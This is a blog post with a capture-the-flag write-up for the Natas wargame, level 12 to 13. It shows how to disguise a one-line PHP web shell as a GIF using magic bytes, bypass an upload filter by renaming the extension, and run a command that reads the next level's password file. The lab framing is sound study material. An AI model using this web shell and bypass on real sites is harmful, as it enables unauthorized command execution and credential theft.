<!DOCTYPE html>
<html>

  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <meta name="description" content="Filter jilter">

    <link rel="shortcut icon" href="/favicon.ico?" type="image/x-icon">
    <link rel="icon" href="/favicon.ico?" type="image/x-icon">
    <link rel="stylesheet" href="https://cdnjs.Cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" />
    <link rel="stylesheet" href="/assets/css/main.min.css ">
    <link rel="canonical" href="/2021/05/27/natas12-13/">
    <link rel="alternate" type="application/rss+xml" title="Caminek" href="/feed.xml ">
    
    <!-- Begin Jekyll SEO tag v2.7.1 -->
<title>Natas Level 12 → Level 13 | Caminek</title>
<meta name="generator" content="Jekyll v4.2.0" />
<meta property="og:title" content="Natas Level 12 → Level 13" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Filter jilter" />
<meta property="og:description" content="Filter jilter" />
<link rel="canonical" href="/2021/05/27/natas12-13/" />
<meta property="og:url" content="/2021/05/27/natas12-13/" />
<meta property="og:site_name" content="Caminek" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-05-27T11:47:18-04:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Natas Level 12 → Level 13" />
<script type="application/ld+json">
{"@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"/2021/05/27/natas12-13/"},"description":"Filter jilter","headline":"Natas Level 12 → Level 13","dateModified":"2021-05-27T11:47:18-04:00","url":"/2021/05/27/natas12-13/","datePublished":"2021-05-27T11:47:18-04:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->






</head>


  <body>

    <header id="top">
    <div class="wrapper">
        
            <img src="/assets/img/misc/avatar.png" alt="site.icon" width="32" height="32" style="vertical-align:middle"/>
        
        <a href="/" class="brand">Caminek</a>
        <small></small>
        <button id="headerMenu" class="menu"><i class="fa fa-bars"></i></button>
        <nav id="headerNav">
            <ul>
                <li>
                    
                    <a href="/">
                    
                        <i class="fa fa-home"></i>Home
                    </a>
                </li>

                
                    
                    <li>
                        
                        <a href="/series/">
                        
                            <i class="fa fa-book"></i>Series
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/archive/">
                        
                            <i class="fa fa-archive"></i>Archives
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/category/">
                        
                            <i class="fa fa-th-list"></i>Categories
                        </a>
                    </li>
                    
                
                    
                    <li>
                        
                        <a href="/tag/">
                        
                            <i class="fa fa-tags"></i>Tags
                        </a>
                    </li>
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
                    
                
            </ul>
        </nav>
    </div>
</header>


        <div class="page clearfix" index>
    <div class="left">
        <h1>Natas Level 12 → Level 13</h1>
        <div class="label">

            <div class="label-card">
                <i class="fa fa-calendar"></i> 2021-05-27
            </div>

            <div class="label-card">
                
            </div>

            <div class="label-card">
                
            </div>

            <div class="label-card">
            


<!-- <span class="point">•</span> -->
<span class="categories">
  <i class="fa fa-th-list"></i>
  
    
        <a href="/category/#ctf" title="Category: ctf" rel="category">ctf</a>&nbsp;
    
        <a href="/category/#wargames" title="Category: wargames" rel="category">wargames</a>&nbsp;
    
        <a href="/category/#web-security" title="Category: web-security" rel="category">web-security</a>
    
  

  <!-- <span class="point">•</span> -->
</span>


            </div>

            <div class="label-card">
            
<!-- <span class="point">•</span> -->
<span class="pageTag">
  <i class="fa fa-tags"></i>
  
    
        <!--a href="/tag/#wargames" title="Tag: wargames" rel="tag">wargames</a-->
        <a href="/tag/#wargames" title="Tag: wargames" rel="tag">wargames</a>&nbsp;
    
        <!--a href="/tag/#ctf" title="Tag: ctf" rel="tag">ctf</a-->
        <a href="/tag/#ctf" title="Tag: ctf" rel="tag">ctf</a>&nbsp;
    
        <!--a href="/tag/#overthewire" title="Tag: overthewire" rel="tag">overthewire</a-->
        <a href="/tag/#overthewire" title="Tag: overthewire" rel="tag">overthewire</a>&nbsp;
    
        <!--a href="/tag/#web-security" title="Tag: web-security" rel="tag">web-security</a-->
        <a href="/tag/#web-security" title="Tag: web-security" rel="tag">web-security</a>
    
  

</span>

            </div>

        </div>
        <hr>
        <article itemscope itemtype="http://schema.org/BlogPosting">
            <h2 id="level-goal">Level Goal</h2>
<p>Excluding the URL and username, the Level Goal section is blank for the Natas ctf.</p>

<h2 id="solution">Solution</h2>
<p>The natas12 website allows us to select and upload an image, and view the page source. This time it claims it will only accept image files.  Since the source is now starting to get a bit longer, I’ll highlight the pertinent line(s) below.</p>

<p>Server-side code:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span> <span class="nb">exif_imagetype</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">'uploadedfile'</span><span class="p">][</span><span class="s1">'tmp_name'</span><span class="p">]))</span> <span class="p">{</span>
    <span class="k">echo</span> <span class="s2">"File is not an image"</span><span class="p">;</span>
</code></pre></div></div>

<p>Client-side code:</p>
<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"hidden"</span> <span class="na">name=</span><span class="s">"filename"</span> <span class="na">value=</span><span class="s">"&lt;? print genRandomString(); ?&gt;.jpg"</span> <span class="nt">/&gt;</span> 
</code></pre></div></div>

<p>Here we see the same method of client-side renaming used in the last level. The site author has also updated the code to include a server-side EXIF data check to try and ensure the data sent is a valid image file. Since we have no control over the server-side, we’ll need to trick the code into accepting our php script once again.  This time, we’ll need to embed the <a href="https://en.wikipedia.org/wiki/List_of_file_signatures">Magic Bytes</a> for a valid image file into our script.</p>

<p>There are several ways to go about adding the magic bytes: you can write a small script in python (or another language) to create the file and embed the hex characters, you can use a hex editor to prepend the hex bytes to the shell.php file from the last level, or you can copy the text characters, not the hex characters and paste them into shell.php with your favorite editor.</p>

<p>Initially, I tried to use the text characters for jpg but was unsuccessful. Looking at the hex output I could see that the characters were wrong. I’m not sure if that was an issue with vim or not. I opted to use GIF instead since it didn’t contain any Unicode characters.</p>

<p>shell.php</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nc">GIF89a</span><span class="o">:</span> <span class="o">&lt;?</span> <span class="nb">passthru</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"cmd"</span><span class="p">]);</span> <span class="cp">?&gt;</span>
</code></pre></div></div>

<p>The colon and space after GIF89a are not part of the magic bytes and are not technically required. They’ve been included to make reading the password at the end of the level easier.</p>

<p>Open the web developer tools for your browser and use the inspector to quickly locate the upload section of the code. You should see something similar to the following:</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">&lt;form</span> <span class="na">enctype=</span><span class="s">"multipart/form-data"</span> <span class="na">action=</span><span class="s">"index.php"</span> <span class="na">method=</span><span class="s">"POST"</span><span class="nt">&gt;</span>
<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"hidden"</span> <span class="na">name=</span><span class="s">"MAX_FILE_SIZE"</span> <span class="na">value=</span><span class="s">"1000"</span><span class="nt">&gt;</span>
<span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"hidden"</span> <span class="na">name=</span><span class="s">"filename"</span> <span class="na">value=</span><span class="s">"upzknql2yq.jpg"</span><span class="nt">&gt;</span>
</code></pre></div></div>

<p>The last line is the one we’re looking for. The name of the file, <strong>upzknql2yq</strong> will be different for you. Change the extension from .jpg to .php using the developer tools. Do not refresh the page or use the browser navigation buttons, or you’ll need to change the extension once again.</p>

<p>With the extension now changed, click on the browse button, select shell.php, and then click upload.</p>

<p>You should see a message similar to the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>The file upload/zidcnm44f9.php has been uploaded
</code></pre></div></div>

<p>Make certain that the uploaded file ends in .php. If not, navigate back and re-edit the page source using the developer tools. Once you have the confirmation that the file uploaded with the .php extension, copy the link to the file location. Do not click the link.</p>

<p>Paste the link into the browser and append the following to the URL:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>?cmd=cat /etc/natas_webpass/natas14
</code></pre></div></div>

<p>The ASCII representation of the magic bytes and the password to the next level will display on the page.</p>

        </article>
        <hr>
        

        <div class="post-recent">
    <div class="pre" style="display:inline-block; margin-top: 20px;">
        
        <p><i class="fa fa-arrow-left"></i> <a href="/2021/05/26/natas11-12/">Natas Level 11 → Level 12</a></p>
        
    </div>
    <div class="nex" style="display:inline-block; margin-top: 20px; float:right;">
        
        <p><a href="/2021/05/27/natas13-14/">Natas Level 13 → Level 14</a> <i class="fa fa-arrow-right"></i></p>
        
    </div>
</div>

        
        
        

    </div>
    <button class="anchor"><i class="fa fa-anchor"></i></button>
    <div class="right">
        <div class="wrap">

            <!-- Content -->
            <!-- <div class="side content">
                <div>
                    Content
                </div>
                <ul id="content-side" class="content-ul">
                    
                    <li><a href="#comments">Comments</a></li>
                </ul>
            </div> -->

            <!-- Series -->
            
            <div class="side">
                <div>
                    <i class="fa fa-book" aria-hidden="true"></i>
                    Series
                </div>
 
                <ul class="content-ul" recent>
                     <!--for loop is 0 based. this prevents off-by-one errors -->
                    

                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                            

                            <!-- prevent Series from showing < 5 entries when near the end of series -->
                            
                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                        

                        
                    
                    

                    <!-- prevent Series from showing < 5 entries when near the start of series -->
                    

                    


                    
                        
                            <li>
                                
                                    <a href="/2021/05/26/natas10-11/">Natas Level 10 → Level 11</a>
                                
                            </li>
                        
                    
                        
                            <li>
                                
                                    <a href="/2021/05/26/natas11-12/">Natas Level 11 → Level 12</a>
                                
                            </li>
                        
                    
                        
                            <li>
                                
                                    <strong>Natas Level 12 → Level 13</strong>
                                
                            </li>
                        
                    
                        
                            <li>
                                
                                    <a href="/2021/05/27/natas13-14/">Natas Level 13 → Level 14</a>
                                
                            </li>
                        
                    
                        
                            <li>
                                
                                    <a href="/2021/05/27/natas14-15/">Natas Level 14 → Level 15</a>
                                
                            </li>
                        
                    
                </ul>
            </div>
            

            
            <div class="side">
                <div>
                    <i class="fa fa-pencil-square-o" aria-hidden="true"></i>
                    Recent Posts
                </div>
                <ul class="content-ul" recent>
                    
                        <li><a href="/2021/05/31/natas26-27/">Natas Level 26 → Level 27</a></li>
                    
                        <li><a href="/2021/05/31/natas25-26/">Natas Level 25 → Level 26</a></li>
                    
                        <li><a href="/2021/05/30/natas24-25/">Natas Level 24 → Level 25</a></li>
                    
                        <li><a href="/2021/05/30/natas23-24/">Natas Level 23 → Level 24</a></li>
                    
                        <li><a href="/2021/05/30/natas22-23/">Natas Level 22 → Level 23</a></li>
                    
                </ul>
            </div>

            <!-- Content -->
            <div class="side ">
                <div>
                    <i class="fa fa-th-list"></i>
                    Categories
                </div>
                <ul class="content-ul" cate>
                    
                    <li>
                        <a href="/category/#reverse-engineering" class="categories-list-item" cate="reverse-engineering">
                            <span class="name">
                                reverse-engineering
                            </span>
                            <span class="badge">13</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#x86-64" class="categories-list-item" cate="x86-64">
                            <span class="name">
                                x86-64
                            </span>
                            <span class="badge">8</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#ctf" class="categories-list-item" cate="ctf">
                            <span class="name">
                                ctf
                            </span>
                            <span class="badge">68</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#wargames" class="categories-list-item" cate="wargames">
                            <span class="name">
                                wargames
                            </span>
                            <span class="badge">63</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#linux" class="categories-list-item" cate="linux">
                            <span class="name">
                                linux
                            </span>
                            <span class="badge">35</span>
                        </a>
                    </li>
                    
                    <li>
                        <a href="/category/#web-security" class="categories-list-item" cate="web-security">
                            <span class="name">
                                web-security
                            </span>
                            <span class="badge">28</span>
                        </a>
                    </li>
                    
                </ul>
            </div>

            <!-- Tag Cloud -->
            
        </div>
    </div>
</div>
<script>
/**
 * target _blank
 */
(function() {
    var aTags = document.querySelectorAll('article a:not([id])')
    for (var i = 0; i < aTags.length; i++) {
        aTags[i].setAttribute('target', '_blank')
    }
}());
</script>
<!-- <script src="/assets/js/pageContent.js " charset="utf-8"></script> -->


    <footer class="site-footer">


    <div class="wrapper">

        <p class="description">
            
        </p>
        <p class="contact">
            Find me on: 
            <a href="https://github.com/caminek" title="GitHub"><i class="fa fa-github" aria-hidden="true"></i></a> 
             
        </p>
        <p class="power">
            <span>
                Site powered by <a href="https://jekyllrb.com/">Jekyll</a> & <a href="https://pages.github.com/">Github Pages</a>.
            </span>
            <span>
                Theme designed by <a href="https://github.com/Gaohaoyang">HyG</a>, and modified by <a href="https://github.com/caminek">caminek</a>.
            </span>
        </p>
    </div>
</footer>

    <div class="back-to-top">
    <a href="#top" data-scroll>
        <i class="fa fa-arrow-up" aria-hidden="true"></i>
    </a>
</div>

    <!-- <script src=" /assets/js/main.js " charset="utf-8"></script>
    <script src=" /assets/js/smooth-scroll.min.js " charset="utf-8"></script> -->
    <script src=" /assets/js/all.js " charset="utf-8"></script>
    <script type="text/javascript">
      smoothScroll.init({
        speed: 500, // Integer. How fast to complete the scroll in milliseconds
        easing: 'easeInOutCubic', // Easing pattern to use
        offset: 20, // Integer. How far to offset the scrolling anchor location in pixels
      });
    </script>
    <!-- <script src=" /assets/js/scroll.min.js " charset="utf-8"></script> -->
  </body>

</html>
